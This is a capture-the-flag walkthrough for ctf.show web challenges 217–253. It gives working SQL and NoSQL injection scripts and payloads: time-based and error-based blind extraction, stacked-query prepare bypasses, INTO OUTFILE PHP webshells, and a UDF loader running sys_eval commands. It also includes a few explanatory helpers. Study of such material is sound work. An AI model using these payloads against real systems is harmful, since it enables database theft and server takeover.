Hmm... I don't quite understand this from_base64 one; trying it in MySQL gave an error. Following another player's writeup, the preceding from_base64 has to be closed off first.

import requests
from time import time
url="http://f2f212e7-fc41-4cc7-a276-4b9b07d5beac.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # table names
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"
        data={
            'ip':f"'MQ==') or if(ascii(substr(({payload}),{i},1))>{mid},sleep(2),1)#",
            'debug':0
        }
        try:
            r=requests.post(url,data,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web217

sleep is banned; use benchmark instead. (Reference: five time-based blind injection techniques)

"""
Author:feng
"""
import requests
import time
url='http://9b2a89ce-8e84-471c-9b2e-be262825623d.chall.ctf.show:8080/api/index.php'

flag=''
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            if chr(j)=='}':
                exit()
            break

        #payload="if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},benchmark(1000000,md5(1)),1)".format(i,j)
        #payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{},1))<{},benchmark(1000000,md5(1)),1)".format(i,j)
        payload="if(ascii(substr((select group_concat(flagaabc) from ctfshow_flagxccb),{},1))<{},benchmark(1000000,md5(1)),1)".format(i,j)

        data={
            'ip':payload,
            'debug':0
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.5)
            min=j
        except:
            max=j
        time.sleep(0.2)
    time.sleep(1)

web218

Use Cartesian-product blind injection, or regex DoS (RLIKE) injection. (Reference link)

Cartesian product: probably because the requests were too frequent, I had to add several sleeps before the injection worked, and it is still error-prone.

import requests
import time
url="http://8b738514-d058-4236-be51-b6e044a1f760.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
tim="SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I"
while True:
    i+=1
    head=32
    tail=127
    while head<tail:

        mid=(head+tail)>>1
        if mid==121:
            time.sleep(2)
        # table names
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"

        data={
            'ip':f"if(ascii(substr(({payload}),{i},1))>{mid},({tim}),1)",
            'debug':0
        }
        try:
            print(data)
            r=requests.post(url,data,timeout=2)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
        time.sleep(5)
    else:
        break

RLIKE is also error-prone

import requests
import time
url="http://8b738514-d058-4236-be51-b6e044a1f760.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
#tim="SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I"
tim="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'"
while True:
    i+=1
    head=32
    tail=127
    while head<tail:

        mid=(head+tail)>>1
        # if mid==121:
        #     time.sleep(2)
        # table names
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"

        data={
            'ip':f"if(ascii(substr(({payload}),{i},1))>{mid},({tim}),1)",
            'debug':0
        }
        try:
            print(data)
            r=requests.post(url,data,timeout=0.3)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
        # time.sleep(5)
    else:
        break

web219

Same as above

web220

function waf($str){
    return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i', $str);
}

For the earlier steps use like or left; for the time-based part use the Cartesian product

import requests
import time
url="http://daf5aa33-1f9a-4e09-a5d8-79b5e452b5b0.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
tim="SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I"
#tim="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'"
flagstr="ctf{}qwertyuiopasdghjklzxvbnm-_"
while True:
    i+=1
    for j in flagstr:
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"

        data={
            'ip':"if((select flagaabcc from ctfshow_flagxcac limit 0,1) like '{}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),1)".format(flag+j+"%"),
            'debug':0
        }
        try:
            print(data)
            r=requests.post(url,data,timeout=0.3)
        except:
            flag+=j
            print(flag)
            if j=='}':
                break
        time.sleep(0.3)

This one is more stable

import requests
import time
url="http://daf5aa33-1f9a-4e09-a5d8-79b5e452b5b0.challenge.ctf.show:8080/api/index.php"

strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp"
payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1"
#payload = "select flagaabcc from ctfshow_flagxcac"
j = 1
res = ""
while 1:
    for i in strr:
        res += i
        data = {
            'ip': f"1) or if(left(({payload}),{j})='{res}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        # print(i)
        try:
            r = requests.post(url, data=data, timeout=3)
            res = res[:-1]
        except Exception as e:
            print(res)
            j+=1

web221

Reference

payload:

http://36730a3f-87be-420b-b904-12acd5647e85.challenge.ctf.show:8080/api?page=1&limit=1%20%20procedure%20analyse(extractvalue(1,concat(1,database())),1)

web222

Blind injection works

Here the sleep fires once for every row; my table had 4 rows, so set a sleep that suits the challenge's data.

import requests
from time import time
url="http://c03e0ff0-543a-4144-99ce-2908a0f30101.challenge.ctf.show:8080/api/?u="
flag=''
i=0
# tables: ctfshow_flaga,ctfshow_user
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# columns: id,flagaabc,inf
#payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
payload="select flagaabc from ctfshow_flaga"

while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        reurl = url + f"1,if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),1)"
        try:
            r=requests.get(reurl,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web223

Digits are banned; build every number out of true (true = 1, true+true = 2, and so on).

import requests

url = 'http://ca210c86-2c3d-497e-bd3e-4b8d38370677.challenge.ctf.show:8080/api/'
flag = ''
i = 0


def gettrue(num):
    # digits are filtered: express the integer num as true+true+...+true
    return '+'.join(['true'] * num)


# tables: ctfshow_flaga,ctfshow_user
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# columns: id,flagaabc,inf
# payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
# payload = "select flagaabc from ctfshow_flaga"

while True:
    head = 32
    tail = 127
    i += 1
    while head < tail:
        mid = (head + tail) >> 1
        params = {
            'u': f"if(ascii(substr(({payload}),{gettrue(i)},{gettrue(1)}))>{gettrue(mid)},username,'a')"
        }
        r = requests.get(url, params=params)
        # when the condition holds the query returns the username column and the
        # page shows its marker string; otherwise it returns the constant 'a'
        if 'passwordAUTO' in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        flag += chr(head)
        print(flag)
    else:
        break

web224

Reference

Upload the file below:

payload.bin

Its contents are the hex bytes shown in the screenshot (not reproduced here).

web225

Stacked queries are allowed, so show can list the tables directly:

http://2a0ed365-1093-4aa0-98a2-23a9721be17a.challenge.ctf.show:8080/api/?username=1';show tables;&page=1&limit=10

Read the table with handler, which needs no select keyword at all:

ctfshow';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

Or with a prepared statement, building the text with concat so that "select" never appears whole in the request:

';prepare a from concat('sele','ct * from `ctfshow_flagasa`');execute a;#

See also the 随便注 challenge.

web226

Prepared statement with the whole SQL text hex-encoded, so none of its keywords appear in the request:

';prepare a from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute a;#

The hex decodes to select group_concat(table_name) from information_schema.tables where table_schema=database(), which returns:

ctfsh_ow_flagas,ctfshow_user

Query the columns and the flag the same way.

web227

References

';prepare a from 0x53454c4543542020202a20202046524f4d202020696e666f726d6174696f6e5f736368656d612e526f7574696e6573;execute a;#

The hex decodes to SELECT   *   FROM   information_schema.Routines (the padding spaces are part of the original), so this dumps the stored routine definitions.
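As an added example (not from the original writeup): a small Python helper that produces and decodes the 0x... literals used in the web226 and web227 payloads, and checks that a payload no longer contains the filtered keywords. The statement name a and the default blacklist are assumptions; use whatever the target actually filters.

```python
def to_hex_literal(sql: str) -> str:
    """Encode a statement as a MySQL 0x... literal. PREPARE x FROM 0x... accepts it,
    so select/union/information_schema never appear in plaintext in the request."""
    return "0x" + sql.encode("utf-8").hex()


def from_hex_literal(literal: str) -> str:
    """Decode a 0x... literal back to text (handy for reading other people's payloads)."""
    if not literal.lower().startswith("0x"):
        raise ValueError("expected a 0x-prefixed hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def prepare_payload(sql: str, stmt_name: str = "a") -> str:
    """Stacked-query payload in the shape used on this page: close the open quote,
    PREPARE the hex-encoded statement, EXECUTE it, comment out the rest of the line."""
    return f"';prepare {stmt_name} from {to_hex_literal(sql)};execute {stmt_name};#"


def survives_blacklist(payload: str, banned=("select", "union", "information_schema")) -> bool:
    """True if none of the banned words occur in the payload text. Note that 'prepare',
    'execute' and 'from' stay visible, which is what a filter would have to catch."""
    lower = payload.lower()
    return not any(word in lower for word in banned)
```

Usage: prepare_payload("select group_concat(table_name) from information_schema.tables where table_schema=database()") reproduces the web226 payload character for character, and from_hex_literal() on the web227 literal gives the Routines query.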

web228

同226

web229

同226

web230

同226

web231

POST the following to api/index.php:

password=1',username=user() where 1=1#&username=1

The password value closes its quote and appends a second SET assignment, so the result of user() (or of a subquery) is written into the username column, which the page displays. Then swap in the subqueries.

Tables (banlist,ctfshow_user,flaga):

password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where  1=1#&username=1

Columns (id,flagas,info):

password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where  1=1#&username=1

Flag:

password=1',username=(select flagas from flaga) where  1=1#&username=1

web232

The same payload works here; the only difference is that the password is wrapped in md5(), so you also have to close that call:

password=c4ca4238a0b923820dcc509a6f75849b') ,username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

web233

Switched to blind injection, since the previous approach no longer works. Set the sleep time carefully: sleep() runs once per row.

import requests

url = "http://15a4a162-cf9c-4a5f-9ddd-d0ac5eda8c30.challenge.ctf.show:8080/api/index.php"
flag = ''
i = 0
# tables: ctfshow_flaga,ctfshow_user
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# columns: id,flagaabc,inf
# payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
# payload = "select flagaabc from ctfshow_flaga"

while True:
    i += 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'password': '1',
            # sleep(0.05) runs once per row, so the total delay scales with the table size
            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),1)#"
        }
        try:
            requests.post(url, data=data, timeout=1)
            tail = mid              # answered in time: character <= mid
        except requests.exceptions.Timeout:
            head = mid + 1          # timed out: character > mid
    if head != 32:
        flag += chr(head)
        print(flag)
    else:
        break

web234

Single quotes are filtered. A backslash in password escapes the closing quote of the password literal, so the string runs on into the username position. The template is $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

Sending password=\&username=,username=database()# turns it into (database name: ctfshow_web):

update ctfshow_user set pass = '\' where username = ',username=database()#';

The pass column receives the literal ' where username = , and the rest of the username value is parsed as SQL: a second assignment username=database(), then # comments out the trailing quote. Change the payload to read the data.

Tables (banlist,ctfshow_user,flag23a):
password=\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

Columns, with the table name as a hex literal (0x666c6167323361 is flag23a) so no quotes are needed (id,flagass23s3,info):
password=\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#

Flag:
password=\&username=,username=(select flagass23s3 from flag23a)#
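Added example, not the writeup's own code: it rebuilds the UPDATE statement from the PHP template above and tokenizes it with MySQL's default string rules, so you can see exactly which part of the input ends up as SQL code rather than string data. The mysql_escape() stand-in for mysqli_real_escape_string is an assumption used only to show why escaping the backslash as well closes the hole; a prepared statement is the proper fix.

```python
TEMPLATE = "update ctfshow_user set pass = '{password}' where username = '{username}';"


def build_query(password: str, username: str) -> str:
    """Interpolate the inputs exactly like the PHP template quoted above."""
    return TEMPLATE.format(password=password, username=username)


def mysql_escape(value: str) -> str:
    """Minimal stand-in for mysqli_real_escape_string: escape backslashes and quotes.
    Assumed for the demo; use a prepared statement in real code."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def split_literals(sql: str):
    """Tokenize a statement into ('code'|'str'|'comment', text) chunks using MySQL's
    default rules: backslash escapes the next character inside a single-quoted literal,
    '' is an escaped quote, and '#' outside a literal comments out the rest of the line."""
    chunks = []
    kind, buf, i, n = "code", "", 0, len(sql)
    while i < n:
        c = sql[i]
        if kind == "code":
            if c == "'":
                if buf:
                    chunks.append(("code", buf))
                kind, buf = "str", ""
            elif c == "#":
                if buf:
                    chunks.append(("code", buf))
                chunks.append(("comment", sql[i:]))
                return chunks
            else:
                buf += c
        else:
            if c == "\\" and i + 1 < n:
                buf += sql[i:i + 2]      # escaped character, including \'
                i += 2
                continue
            if c == "'" and i + 1 < n and sql[i + 1] == "'":
                buf += "''"              # doubled quote inside a literal
                i += 2
                continue
            if c == "'":
                chunks.append(("str", buf))
                kind, buf = "code", ""
            else:
                buf += c
        i += 1
    if buf:
        chunks.append((kind, buf))
    return chunks


def injected_code(password: str, username: str, escape: bool = False) -> str:
    """Return everything the parser treats as SQL code (not string data). With the
    web234 inputs this includes the attacker's second SET assignment; with escaping
    applied it is only the template's own text."""
    if escape:
        password, username = mysql_escape(password), mysql_escape(username)
    chunks = split_literals(build_query(password, username))
    return "".join(text for kind, text in chunks if kind == "code")
```

split_literals(build_query("\\", ",username=database()#")) shows the first literal swallowing the where clause and ,username=database() surfacing as code; with escape=True the backslash becomes \\ and database() stays inside a string.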

web235

Filters or, ' and information. See the reference on bypassing information_schema: mysql.innodb_table_stats lists the InnoDB tables of each database and is the usual substitute.

Tables (banlist,ctfshow_user,flag23a1):
password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

Column-name-less injection: the first SELECT of a UNION fixes the output column names, so the unknown table's columns can be read by position without ever naming them.

password=\&username=,username=(select group_concat(`2`) from (select 1,2,3 union select * from flag23a1)a)#
or
password=\&username=,username=(select b from (select 1,2 as b,3 union select * from flag23a1 limit 1,1)a)#

web236

Tables, same as above (banlist,ctfshow_user,flaga):

password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

Hmm, it seems the filter is on the output rather than on the input, so encode the result:

password=\&username=,username=(select to_base64(b) from (select 1,2 as b,3 union select * from flaga limit 1,1)a)#
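Added example (SQLite standing in for MySQL; not the challenge's code) showing the column-name-less trick from web235 and web236 end to end on a constructed table: first probe the unknown table's width with UNION, then alias the position you want to read. Table name, column names and the flag value are made up for the demo.

```python
import sqlite3


def demo_connection(flag_value: str) -> sqlite3.Connection:
    """Constructed stand-in for the challenge database: one table whose column
    names the attacker does not know (SQLite replaces MySQL here)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table flag23a1(id integer, flagass23s3 text, info text)")
    con.execute("insert into flag23a1 values (1, ?, 'info')", (flag_value,))
    return con


def find_column_count(con: sqlite3.Connection, table: str, max_cols: int = 8):
    """Probe the width of a table whose columns you cannot list: a UNION whose two
    sides have different column counts is rejected, a matching one succeeds."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            con.execute(f"select {cols} union select * from {table}").fetchall()
            return n
        except sqlite3.Error:
            continue
    return None


def read_unknown_column(flag_value: str = "ctfshow{constructed-demo}", position: int = 2):
    """The web235 payload: the first SELECT of the UNION decides the output column
    names, so aliasing one constant (2 as b) lets the unknown table's column at that
    position be read as b without naming flagass23s3 or touching information_schema."""
    con = demo_connection(flag_value)
    width = find_column_count(con, "flag23a1")
    cols = ",".join(f"{i} as b" if i == position else str(i) for i in range(1, width + 1))
    rows = con.execute(f"select b from (select {cols} union select * from flag23a1) a").fetchall()
    # the constant row (value 2) comes back together with the real data; drop it client-side
    return [str(r[0]) for r in rows]
```

The page's limit 1,1 serves the same purpose as the client-side filtering here; on SQLite the UNION output order is not the one MySQL gives, so the example returns both rows and lets the caller pick.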

web237

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

Close the single quote and insert the result of a subquery into the table as the second column.

Tables (banlist,ctfshow_user,flag):
username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=1

Columns (id,flagass23s3,info):
username=1',(select group_concat(column_name) from information_schema.columns where table_name='flag'))#&password=1

Flag:
username=1',(select group_concat(flagass23s3) from flag))#&password=1

web238

Spaces are filtered; wrap everything in parentheses instead. * seems to be banned as well.

username=2',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=1
username=2',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')))#&password=1

web239

or is filtered; bypass information_schema as before. I couldn't get this one.

web240

import itertools
import requests

url = "http://e8acf4aa-90c8-414d-9630-b2259e10521c.challenge.ctf.show:8080/api/insert.php"

# The table name is "flag" followed by five characters from {a,b}: 32 candidates.
# Each request inserts (select(flag)from(<candidate>)) as the username; only the
# candidate that actually exists succeeds and leaves the flag in the user table.
for chars in itertools.product("ab", repeat=5):
    table = "flag" + "".join(chars)
    data = {
        'username': f"1',(select(flag)from({table})))#",
        'password': '1'
    }
    print(data)
    requests.post(url, data=data)

After the script finishes, refresh the front page and the flag is there.

web241

Time-based blind injection. Tune the sleep value; the result is easily disturbed by network latency.

import requests
import time

url = "http://3a73254d-26fa-44cb-bf98-e7502e136583.challenge.ctf.show:8080/api/delete.php"
flag = ''
i = 0
# tables
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# columns
# payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
# payload = "select flagaabc from ctfshow_flaga"

while True:
    head = 32
    tail = 127
    i += 1
    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'id': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.5),0)"
        }
        try:
            requests.post(url, data=data, timeout=0.9)
            tail = mid              # answered in time: character <= mid
        except requests.exceptions.Timeout:
            head = mid + 1          # timed out: character > mid
        time.sleep(0.2)             # give the server a moment between probes
    if head != 32:
        flag += chr(head)
        print(flag)
    else:
        break

web242

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']        -- field separator
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

The bracketed options are optional; their meanings:

`FIELDS TERMINATED BY 'string'`: separator written between fields, one or more characters. Default "\t".

`FIELDS ENCLOSED BY 'char'`: character that encloses each field value, a single character. None by default.

`FIELDS OPTIONALLY ENCLOSED BY 'char'`: encloses only character-typed fields (CHAR, VARCHAR, TEXT). None by default.

`FIELDS ESCAPED BY 'char'`: the escape character, a single character. Default "\".

`LINES STARTING BY 'string'`: prefix written at the start of each line, one or more characters. None by default.

`LINES TERMINATED BY 'string'`: string written at the end of each line, one or more characters. Default "\n".

FIELDS TERMINATED BY, LINES STARTING BY and LINES TERMINATED BY can all carry the payload, since each of them is written verbatim into the output file.

payload

filename=1.php' LINES STARTING BY '<?php eval($_POST[1]);?>'#

The exported row data surrounds the tag, which does not matter: PHP executes only what is between <?php and ?>. For this to work the database user needs the FILE privilege, secure_file_priv must be empty, and the target directory must be writable by the mysqld process. After getting the shell, the flag is in the server's root directory.

web243

"php" is filtered, so neither a <?php tag nor a .php filename gets through.

There is an index.php under dump/; the response code shows that its 403 is only faked. So write a .user.ini instead. payload

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e6a70670a#

Each exported line starts with ;, which comments out the row data in ini syntax, and ends with the hex string, which decodes to a newline followed by:

auto_prepend_file=1.jpg

Then upload 1.jpg using a short tag, which contains no "php":

filename=1.jpg' LINES STARTING BY '<?=eval($_POST[1]);?>'#

Then request dump/ (its index.php now prepends 1.jpg) to get the shell. Note that .user.ini is only honoured by the CGI/FastCGI SAPIs (PHP-FPM), not by mod_php.

web244

UPDATEXML() error-based injection

UPDATEXML(XML_document, XPath_string, new_value);
first argument: XML_document, a string, the XML document (Doc in the documentation example)
second argument: XPath_string, an XPath expression; look up an XPath tutorial if the syntax is unfamiliar
third argument: new_value, a string that replaces the matched data
purpose: change the value of the nodes in the document that match the XPath

payload

id=' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)-- -

The second argument starts with 1, which is not valid XPath, so MySQL raises an XPATH syntax error whose message quotes the offending string, i.e. the contents of the concat(). The message shows at most 32 characters, so longer results have to be paged with substr() or limit.

web245

updatexml is filtered; use extractvalue() for the error instead, which works the same way. payload (when sending from a browser the # must be URL-encoded as %23, otherwise it is treated as a fragment and never reaches the server)

?id=' or extractvalue(1,concat(0x7e,database(),0x7e))#23

web246

Double-query error-based injection (floor(rand()*2) with group by). Principle: grouping on a key built from the non-deterministic rand() value makes MySQL try to insert the same key twice into its temporary table, and the resulting "Duplicate entry '...' for key 'group_key'" error echoes the key, which carries the data. With an unseeded rand() the error is probabilistic, so repeat the request if it does not fire; rand(0) makes it deterministic as long as the grouped table has at least three rows. payload

' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

?id=' union select 1,count(*),concat((select flag2 from ctfshow_flags),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

web247

Reference

Same technique, but the payload uses ceil() instead of floor(). ceil rounds up; round works as well:

ROUND(X) rounds X to an integer with no decimal places. ROUND(X,D) rounds X to D decimal places; a negative D rounds to the left of the decimal point.

Twelve error-based techniques

1. floor + rand + group by
select * from user where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
select * from user where id=1 and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

2. ExtractValue
select * from user where id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3. UpdateXml
select * from user where id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));

4. Name_Const(>5.0.12)
select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;

5. Join
select * from(select * from mysql.user a join mysql.user b)c;
select * from(select * from mysql.user a join mysql.user b using(Host))c;
select * from(select * from mysql.user a join mysql.user b using(Host,User))c;

6. exp()  // apparently no longer works on MySQL 5.7
select * from user where id=1 and Exp(~(select * from (select version())a));

7. geometrycollection()  // apparently no longer works on MySQL 5.7
select * from user where id=1 and geometrycollection((select * from(select * from(select user())a)b));

8. multipoint()  // apparently no longer works on MySQL 5.7
select * from user where id=1 and multipoint((select * from(select * from(select user())a)b));

9. polygon()  // apparently no longer works on MySQL 5.7
select * from user where id=1 and polygon((select * from(select * from(select user())a)b));

10. multipolygon()  // apparently no longer works on MySQL 5.7
select * from user where id=1 and multipolygon((select * from(select * from(select user())a)b));

11. linestring()  // apparently no longer works on MySQL 5.7
select * from user where id=1 and linestring((select * from(select * from(select user())a)b));

12. multilinestring()  // apparently no longer works on MySQL 5.7
select * from user where id=1 and multilinestring((select * from(select * from(select user())a)b));

payload

?id=' union select 1,count(*),concat(0x7e,0x7e,(select `flag?` from ctfshow_flagsa limit 0,1),0x7e,ceil(rand()*2))a from information_schema.columns group by a-- -

web248

I couldn't do this one myself; see the UDF reference.

# Reference script
# Environment: Linux / MariaDB (the target reported 10.3.18-MariaDB)
import requests

url = 'http://15700a19-71aa-4c90-b3ca-b6db9d77c56d.chall.ctf.show/api/?id='
# hex of the compiled UDF shared object (e.g. lib_mysqludf_sys, which provides sys_eval),
# built for the target's architecture; the blob itself is not reproduced on this page
code = ''
if not code:
    raise SystemExit('fill in the hex of the UDF .so first')
# split the hex into 128-character pieces so every request stays small
codes = [code[i:i + 128] for i in range(0, len(code), 128)]


def run(sql):
    """Stacked-query wrapper: close the id quote, append the statement, comment out the rest."""
    payload = "0';{};-- A".format(sql)
    return requests.get(url + payload)


# create the staging table (only needed once)
# run('create table temp(data longblob)')

# empty the staging table
run('delete from temp')

# insert the first piece
run('insert into temp(data) values (0x{})'.format(codes[0]))

# append the remaining pieces
for k in range(1, len(codes)):
    run('update temp set data = concat(data,0x{})'.format(codes[k]))

# write the .so into the plugin directory
# (verify the path first with: show variables like 'plugin_dir'; needs FILE and an empty secure_file_priv)
run("select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so'")

# register the user-defined function
run("create function sys_eval returns string soname 'udf.so'")

# execute the command and store its output where the page will render it
run("update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))")

# read the result
r = requests.get(url[:-4] + '?page=1&limit=10')
print(r.text)

web249

Reference

payload

?id[]=flag

web250

payload

username[$ne]=1&password[$ne]=1

web251

Using the previous challenge's payload gives admin's username and password; then

username[$ne]=admin&password[$ne]=1

switch to a user that is not admin. I don't quite understand this one.

web252

username[$ne]=1&password[$ne]=1
username[$ne]=admin&password[$ne]=1

Then the user must not be admin1 either, so use a regex that excludes every name starting with a:

username[$regex]=^[^a].*$&password[$ne]=1

web253

Blind injection via $regex: grow the password prefix one character at a time.

import requests

url = "http://2a39bed8-27b1-44c6-a90e-235e85cd3ce7.challenge.ctf.show:8080/api/"
flag = ''
charset = "ctf{}1234567890qweryuioplkjhgdsazxvbnm-_"

for _ in range(50):
    for j in charset:
        data = {
            'username[$regex]': 'flag',
            'password[$regex]': f"^{flag + j}"
        }
        print(data)
        r = requests.post(url, data=data)
        # the JSON response escapes 登录成功 ("login successful") as \u767b\u9646\u6210\u529f
        if r"\u767b\u9646\u6210\u529f" in r.text:
            flag += j
            print(flag)
            break
    else:
        break               # no character matched: nothing more to extract
    if flag.endswith('}'):
        break
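Added example, not the original writeup's code, covering web250 to web253: how PHP turns username[$ne]=1 into an array, what the resulting MongoDB filter matches, the $regex prefix extraction loop, and a hardened version that rejects non-string input. The user collection and the matcher are constructed stand-ins for a real MongoDB (which evaluates $regex with PCRE); field names and sample values are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample collection (not the challenge's real data).
USERS = [
    {"username": "admin", "password": "adm1n_pass"},
    {"username": "admin1", "password": "other"},
    {"username": "flag", "password": "ctfshow{constructed}"},
]


def php_parse_query(qs: str) -> dict:
    """Parse a query/body string the way PHP fills $_GET/$_POST: the key
    'username[$ne]' becomes {'username': {'$ne': '1'}} instead of a plain string."""
    result = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            base, sub = key[: key.index("[")], key[key.index("[") + 1 : -1]
            result.setdefault(base, {})[sub] = value
        else:
            result[key] = value
    return result


def vulnerable_filter(params: dict) -> dict:
    """What the challenge effectively does: the request values go into the query
    document unchanged, so an array value becomes a MongoDB operator."""
    return {"username": params.get("username"), "password": params.get("password")}


def safe_filter(params: dict) -> dict:
    """Hardened version: only scalar strings are accepted, so {'$ne': ...} can never
    reach the driver (in PHP: an is_string() check or a (string) cast before querying)."""
    out = {}
    for field in ("username", "password"):
        value = params.get(field, "")
        if not isinstance(value, str):
            raise ValueError(f"{field} must be a string, got {type(value).__name__}")
        out[field] = value
    return out


def matches(doc: dict, flt: dict) -> bool:
    """Tiny matcher for the two operators used on this page ($ne, $regex); enough to
    show which documents each filter selects. Python's re stands in for PCRE."""
    for field, cond in flt.items():
        value = doc.get(field)
        if isinstance(cond, dict):
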